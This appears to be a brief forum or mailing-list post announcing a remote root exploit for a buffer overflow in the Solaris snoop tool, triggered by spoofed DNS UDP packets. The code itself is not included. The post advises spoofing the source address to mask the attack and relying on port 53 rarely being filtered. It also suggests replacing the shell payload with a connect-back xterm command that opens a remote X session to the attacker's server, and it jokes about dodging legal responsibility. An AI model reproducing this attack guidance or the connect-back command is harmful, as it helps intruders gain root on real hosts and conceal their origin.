Here's a remote Solaris exploit. It is a client side overflow so its kind of interesting. It works by overflowing a buffer in the client (snoop) when parsing network information. Were able to leverage root access by clobbering some pointer values with valid addresses and executing some arbitrary code. Here's the exploit. The applications are sort of limited, even though it has a few interesting permutations. You can spoof the udp packet's source address thereby masking your attack also the target host may be any host on a reachable network. The nature of the specific protocol here (dns) should leave most hosts open to attack (dst port 53 is rarely filtered), and as long as you can get into the collision domain (layer 2) segment, the attack should succeed. This means that even if hosts are separated by a vlan, the target host should be comprised (however, you should change the execution string to something other then simply loading a port shell, for the host will still be unreachable, /usr/X/xterm -ut -display my.X.server:0 &, the funny thing about this is that the xterm will connect back to you I'm not entirely sure of the legal ramifications, but if some network traffic from unknown origin causes my host to establish a connection to YOUR server, I cant see how the receiving X server could be held responsible ). Neat eh?